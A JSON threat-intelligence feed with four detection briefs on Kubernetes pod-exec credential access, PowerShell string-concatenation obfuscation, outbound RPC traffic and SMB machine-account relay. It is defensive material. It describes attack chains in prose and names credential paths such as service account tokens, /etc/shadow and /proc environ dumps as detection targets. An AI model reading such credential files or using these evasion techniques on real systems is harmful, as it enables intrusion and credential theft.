{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/products/elastic-license-v2/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic License v2"],"_cs_severities":["high"],"_cs_tags":["kubernetes","credential-access","execution"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection identifies Kubernetes pod exec sessions accessing sensitive files or credential paths. The goal is to detect attackers attempting to steal credentials or configuration information from within Kubernetes pods. This often occurs after initial access and may precede lateral movement, privilege escalation, or data exfiltration. The detection focuses on command lines that reference paths related to service account tokens, kubelet configuration, host identity stores, common private keys, keystore extensions, process environment dumps, and configuration files with embedded secrets. The rule is designed to catch both interactive and scripted access, and includes exclusions for benign reads of resolv.conf.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to a Kubernetes cluster, potentially through a compromised application or misconfigured service.\u003c/li\u003e\n\u003cli\u003eAttacker uses \u003ccode\u003ekubectl exec\u003c/code\u003e or similar tools to execute commands within a pod.\u003c/li\u003e\n\u003cli\u003eThe executed command attempts to read sensitive files or directories within the pod\u0026rsquo;s filesystem, such as \u003ccode\u003e/var/run/secrets/kubernetes.io/serviceaccount/token\u003c/code\u003e to obtain the pod\u0026rsquo;s service account token.\u003c/li\u003e\n\u003cli\u003eThe command may also target host-level files if the pod has hostPath mounts or runs in a privileged context, like \u003ccode\u003e/etc/shadow\u003c/code\u003e or \u003ccode\u003e/etc/passwd\u003c/code\u003e for credential access.\u003c/li\u003e\n\u003cli\u003eThe attacker may attempt to dump process environments via \u003ccode\u003e/proc/\u0026lt;pid\u0026gt;/environ\u003c/code\u003e to extract sensitive information stored as environment variables.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages obtained credentials or configuration to move laterally to other pods or nodes within the cluster.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges within the cluster by abusing stolen service account tokens or node credentials.\u003c/li\u003e\n\u003cli\u003eThe final objective is to exfiltrate sensitive data, deploy malicious workloads, or disrupt services within the Kubernetes environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the compromise of sensitive data, including credentials, configuration files, and application secrets. This can enable attackers to move laterally within the Kubernetes cluster, escalate privileges, and potentially gain control over the entire environment. The severity of the impact depends on the sensitivity of the data exposed and the level of access achieved by the attacker.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect sensitive file access within Kubernetes pod exec sessions.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts triggered by the Sigma rule, focusing on the \u003ccode\u003eEsql.access_type\u003c/code\u003e field to prioritize incidents.\u003c/li\u003e\n\u003cli\u003eReview and tighten RBAC permissions for pod exec to limit access to authorized users and service accounts.\u003c/li\u003e\n\u003cli\u003eImplement admission controls to prevent pods from running in privileged mode or using hostPath mounts unless absolutely necessary.\u003c/li\u003e\n\u003cli\u003eMonitor Kubernetes audit logs for suspicious \u003ccode\u003ekubectl exec\u003c/code\u003e activity, including unusual command lines or access patterns.\u003c/li\u003e\n\u003cli\u003eRegularly rotate Kubernetes service account tokens and other sensitive credentials to minimize the impact of potential breaches.\u003c/li\u003e\n\u003cli\u003eUse the provided Kubernetes audit log query to proactively search for historical instances of sensitive file access.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T21:42:34Z","date_published":"2026-05-04T21:42:34Z","id":"/briefs/2024-01-kubernetes-pod-exec-sensitive-file-access/","summary":"This rule detects Kubernetes pod exec sessions where the decoded command line references sensitive files or paths such as mounted service account tokens, kubelet and control-plane configuration, host identity stores, private keys, and process environment dumps, aiming to identify potential lateral movement, privilege escalation, or credential theft.","title":"Kubernetes Pod Exec Sensitive File or Credential Path Access","url":"https://feed.craftedsignal.io/briefs/2024-01-kubernetes-pod-exec-sensitive-file-access/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic License v2"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","powershell","obfuscation"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule identifies PowerShell scripts employing concatenated string literals within dynamic invocation constructs like \u003ccode\u003e\u0026amp;()\u003c/code\u003e or \u003ccode\u003e.()\u003c/code\u003e. This obfuscation technique allows attackers to construct commands dynamically, making it harder to detect their malicious intent based on static analysis or keyword matching. By breaking commands into smaller, concatenated strings, attackers aim to bypass traditional signature-based detections and evade AMSI (Anti-Malware Scan Interface). This technique has been observed in various campaigns where threat actors attempt to execute malicious code while minimizing the chances of detection. This activity is particularly concerning for defenders, as it highlights a common method to bypass security measures.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker executes a PowerShell script on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe PowerShell script uses string concatenation to build malicious commands dynamically.\u003c/li\u003e\n\u003cli\u003eDynamic invocation constructs like \u003ccode\u003e\u0026amp;()\u003c/code\u003e or \u003ccode\u003e.()\u003c/code\u003e are used to execute the concatenated commands.\u003c/li\u003e\n\u003cli\u003eThe obfuscated commands bypass keyword-based detections and AMSI.\u003c/li\u003e\n\u003cli\u003eThe attacker performs malicious activities, such as downloading additional payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the downloaded payloads to establish persistence or exfiltrate data.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as stealing sensitive information or deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to complete system compromise, data theft, and potential ransomware deployment. Attackers can leverage this technique to evade security controls and execute malicious commands undetected. The impact is high because it allows attackers to bypass common defenses and maintain persistence on the system, affecting potentially hundreds or thousands of systems across an organization.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable PowerShell Script Block Logging to capture the events necessary for this detection, as indicated in the setup instructions linked in the source material.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect PowerShell Obfuscation via String Concatenation\u003c/code\u003e to your SIEM and tune for your environment to detect the use of concatenated strings in PowerShell commands.\u003c/li\u003e\n\u003cli\u003eInvestigate alerts generated by the Sigma rule, focusing on the reconstructed PowerShell commands and the processes that launched them, as outlined in the triage and analysis section of the source material.\u003c/li\u003e\n\u003cli\u003eMonitor for follow-on activities, such as child processes, file modifications, and network connections originating from PowerShell processes exhibiting obfuscation techniques.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T15:00:00Z","date_published":"2024-01-03T15:00:00Z","id":"/briefs/2024-01-posh-concat-obfuscation/","summary":"This rule detects PowerShell scripts that build commands from concatenated string literals within dynamic invocation constructs, a technique used by attackers to obscure execution intent, bypass keyword-based detections, and evade AMSI.","title":"PowerShell Obfuscation via Concatenated Dynamic Command Invocation","url":"https://feed.craftedsignal.io/briefs/2024-01-posh-concat-obfuscation/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic License v2"],"_cs_severities":["high"],"_cs_tags":["network-traffic","initial-access","lateral-movement","rpc"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThe Remote Procedure Call (RPC) protocol, while essential for legitimate system administration tasks such as remote maintenance and resource sharing within internal networks, poses a significant security risk when exposed to the internet. Threat actors frequently target and exploit RPC services as an initial access vector or to establish backdoors within compromised systems. This exposure allows attackers to remotely execute commands, move laterally within the network, and potentially exfiltrate sensitive data. This brief provides detection strategies to identify such anomalous RPC traffic, enabling security teams to proactively mitigate potential threats. The detection focuses on identifying TCP traffic to port 135 from internal IP ranges to external IP addresses.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises a host within the internal network, potentially through phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe compromised host initiates an RPC connection to an external IP address on TCP port 135.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the RPC connection to enumerate network resources and identify potential targets for lateral movement.\u003c/li\u003e\n\u003cli\u003eUsing the RPC connection, the attacker attempts to authenticate to other systems within the network.\u003c/li\u003e\n\u003cli\u003eUpon successful authentication, the attacker remotely executes commands on the target system via RPC.\u003c/li\u003e\n\u003cli\u003eThe attacker installs malware or a backdoor on the target system for persistence.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the established foothold to further propagate within the network, compromising additional systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of RPC services exposed to the internet can lead to a complete compromise of the internal network. Attackers can gain initial access, move laterally, exfiltrate sensitive data, deploy ransomware, or disrupt critical business operations. A single exposed RPC service can serve as a gateway for widespread damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement the provided Sigma rule to detect RPC traffic from internal IP ranges to external destinations on TCP port 135, focusing on network traffic logs.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, prioritizing systems exhibiting suspicious RPC activity (Sigma rule, logsource: network_connection).\u003c/li\u003e\n\u003cli\u003eEnsure that RPC services are not directly exposed to the internet. Implement firewall rules to restrict access to authorized internal IP ranges only.\u003c/li\u003e\n\u003cli\u003eContinuously monitor network traffic for anomalous RPC activity and correlate with other security events (logsource: network_connection).\u003c/li\u003e\n\u003cli\u003eReview and update firewall configurations to block unauthorized outbound connections on port 135 (logsource: firewall).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:27:00Z","date_published":"2024-01-03T14:27:00Z","id":"/briefs/2024-01-rpc-internet-access/","summary":"This brief focuses on detecting Remote Procedure Call (RPC) traffic originating from internal networks and reaching the public internet, which is indicative of potential initial access or backdoor activity.","title":"Detecting RPC Traffic to the Internet","url":"https://feed.craftedsignal.io/briefs/2024-01-rpc-internet-access/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic License v2"],"_cs_severities":["high"],"_cs_tags":["credential-access","smb-relay","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule identifies potential SMB relay attacks targeting machine accounts in Windows environments. The attack involves an adversary intercepting and relaying authentication requests to gain unauthorized access to network resources. The detection focuses on analyzing Windows Security Event Logs for file share access events (event code 5145) where the source IP address is different from the target server\u0026rsquo;s IP address, but the user name matches the target server\u0026rsquo;s computer account (ends with \u0026ldquo;$\u0026rdquo;). This activity could indicate that an attacker is relaying SMB authentication requests from a compromised system to the target server, effectively impersonating the machine account. Detecting this behavior is crucial for identifying and mitigating potential lateral movement and credential access attempts within the network.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises a host within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker initiates an SMB connection to a target server.\u003c/li\u003e\n\u003cli\u003eThe attacker intercepts the authentication request.\u003c/li\u003e\n\u003cli\u003eThe attacker relays the authentication request to another server using the target server\u0026rsquo;s machine account.\u003c/li\u003e\n\u003cli\u003eThe target server authenticates the relayed request, granting access to the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access to network shares and resources on the target server.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts lateral movement to other systems within the domain.\u003c/li\u003e\n\u003cli\u003eThe attacker performs credential access activities, such as dumping credentials or accessing sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to gain unauthorized access to network resources, potentially leading to lateral movement, data theft, or system compromise. A successful SMB relay attack can compromise critical systems and expose sensitive data, potentially impacting hundreds or thousands of systems within the domain. This can result in significant financial losses, reputational damage, and legal liabilities.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Audit Detailed File Share monitoring to generate the necessary event logs for detection (Setup instructions: \u003ca href=\"https://ela.st/audit-detailed-file-share)\"\u003ehttps://ela.st/audit-detailed-file-share)\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule \u0026ldquo;Potential Machine Account Relay Attack via SMB\u0026rdquo; to your SIEM to detect suspicious SMB activity based on event code 5145 and abnormal source IP addresses.\u003c/li\u003e\n\u003cli\u003eInvestigate alerts generated by the Sigma rule by reviewing surrounding authentication events (event codes 4624 and 4625) to confirm the use of machine accounts from unexpected source IPs.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation and restrict SMB access between systems to limit the potential impact of SMB relay attacks.\u003c/li\u003e\n\u003cli\u003eEnforce SMB signing or Extended Protection to prevent man-in-the-middle attacks.\u003c/li\u003e\n\u003cli\u003eMonitor for related alerts as described in the transform.investigate sections, focusing on suspicious authentication, service creation, persistence, or credential access on the host.id.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-machine-account-relay/","summary":"The rule identifies potential relay attacks against a machine account by detecting network share access events originating from a remote source IP but utilizing the target server's computer account, which may indicate an SMB relay attack.","title":"Potential Machine Account Relay Attack via SMB","url":"https://feed.craftedsignal.io/briefs/2024-01-machine-account-relay/"}],"language":"en","title":"CraftedSignal Threat Feed — Elastic License V2","version":"https://jsonfeed.org/version/1.1"}